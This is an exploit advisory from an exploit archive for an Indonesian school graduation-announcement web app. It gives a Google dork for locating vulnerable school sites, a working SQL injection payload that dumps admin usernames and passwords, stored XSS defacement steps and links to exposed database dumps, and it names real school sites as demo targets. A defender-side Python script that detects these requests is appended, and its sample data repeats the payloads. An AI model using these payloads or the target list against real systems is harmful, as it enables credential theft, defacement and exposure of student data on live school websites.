Aplikasi Pengumuman Kelulusan – SQL-I, XSS, and Database Information Disclosure Vulnerability

2020.10.05
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#Exploit Title: Aplikasi Pengumuman Kelulusan – SQL-I, XSS, and Database Information Disclosure Vulnerability
#Date: 2020-09-09
#Exploit Author: Gh05t666nero
#Vendor Homepage: https://github.com/slametbsan
#Google Dork: intitle:Pengumuman.Kelulusan site:sch.id intext:Masukkan
#Category: webapps
#Tested On: Linux #1 SMP Debian 5.7.6-1kali2 (2020-07-01)
#Software Link: https://github.com/slametbsan/kelulusan/archive/kelulusan.zip

#############################################
[*] SQL Injection

#Query:
Gh05t666nero' or'1'=1 And/**/.0union/*%26*/distinctROW select (SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(un_user)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x203a3a20,password,0x3c62723e))))x),2,3,4,5,6,(select group_concat(column_name,0x3c62723e,table_name) from information_schema.columns where table_schema=database()),8#

#Demo:
Demo 1: http://pengumuman.smkn1nabire.sch.id
Demo 2: http://smkn2bulik.sch.id/kelulusan
Demo 3: http://smkn2sampang.sch.id/kelulusan/19

#Proof of Concept:
Do a search using the dork provided above, then exploit the vulnerability using the query listed above. Copy the query and paste it into the form in the middle of the page, then submit it; it will automatically dump the username|password pairs stored in the site's database.

#Login Page:
For the login page, just add the path /admin

#############################################
[*] Cross Site Scripting [STORED]

#Payload:
<br><h1 style="color:green; text-align:center;">Poisoned by Gh05t666nero</h1>

#Proof of Concept:
Enter the admin dashboard using the credentials obtained from the SQL injection described above, then open the Konfigurasi menu. Before entering the XSS payload, click the Edit button first. After that, enter the XSS payload in the Nama Sekolah form and click the Save button; the payload will be executed and stored.

#############################################
[*] Database Information Disclosure

#Example Bug:
http://www.mikrotik.smkn3garut.sch.id/un2016.sql
http://smkn2bulik.sch.id/kelulusan/un2016.sql
http://kelulusan.smkn1jati.sch.id/un2016.sql

#############################################
Contact Me:
gh05t666nero@gmail.com
Instagram: @ojan_xploit
Telegram: @Gh05t666nero1
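As an added defender-side example (not part of the advisory or the kelulusan project), the following script classifies web requests against the traits of the three findings above: the split-keyword UNION injection, the stored HTML payload, and direct fetches of the exposed un2016.sql dump. The sample requests, the /kelulusan/admin/konfigurasi route and the nomor / nama_sekolah field names are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample requests (method, path, form body) modelled on the advisory's
# findings; paths and field names are assumptions, not the app's real routes.
SAMPLE_REQUESTS = [
    ("POST", "/kelulusan/", "nomor=1234567890"),                       # normal lookup
    ("POST", "/kelulusan/", "nomor=Gh05t666nero'+or'1'%3D1+And/**/.0union/*%26*/"
     "distinctROW+select+(SELECT(%40x%3A%3D0x00)),2,3,(select+group_concat(column_name)"
     "+from+information_schema.columns+where+table_schema%3Ddatabase())%23"),
    ("GET", "/kelulusan/un2016.sql", ""),                               # dump in web root
    ("POST", "/kelulusan/admin/konfigurasi", "nama_sekolah=%3Cbr%3E%3Ch1+style%3D%22"
     "color%3Agreen%22%3EPoisoned%3C%2Fh1%3E"),                         # stored XSS
]

# Each signature targets one trait of the advisory's payloads rather than a bare
# keyword, so the split-keyword tricks (/**/, .0union) do not evade it.
SIGNATURES = [
    ("sqli:tautology", re.compile(r"'\s*or\s*'?\d+'?\s*=\s*'?\d+", re.I)),
    ("sqli:union-select", re.compile(r"union\W+(\w+\W+)?select", re.I)),
    ("sqli:information-schema", re.compile(r"information_schema\.", re.I)),
    ("sqli:user-variable", re.compile(r"@\w+\s*:=")),
    ("xss:html-markup", re.compile(r"<\s*/?\s*[a-z][\w-]*[\s>/]", re.I)),
]
DUMP_FILE = re.compile(r"\.(sql|sql\.gz|bak)$", re.I)

def normalize(value: str) -> str:
    # URL-decode twice (the payload hides %26 inside a comment) and strip the
    # inline /*...*/ comments MySQL accepts between keywords.
    decoded = unquote_plus(unquote_plus(value))
    return re.sub(r"/\*.*?\*/", " ", decoded, flags=re.S)

def classify(method: str, path: str, body: str) -> list:
    """Return the list of finding labels for one request (empty if clean)."""
    findings = []
    if DUMP_FILE.search(path):
        findings.append("database-dump-request")
    text = normalize(path + "?" + body)
    findings.extend(name for name, rx in SIGNATURES if rx.search(text))
    return findings

def scan(records) -> dict:
    """Map each suspicious request index to its findings; clean ones are omitted."""
    return {i: classify(*r) for i, r in enumerate(records) if classify(*r)}

if __name__ == "__main__":
    for i, findings in scan(SAMPLE_REQUESTS).items():
        print(f"{SAMPLE_REQUESTS[i][0]} {SAMPLE_REQUESTS[i][1]}: {', '.join(findings)}")
```

Running it flags the three malicious records and leaves the plain exam-number lookup alone; the same normalize-then-match approach carries over to access-log review or a WAF rule.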


Copyright 2021, cxsecurity.com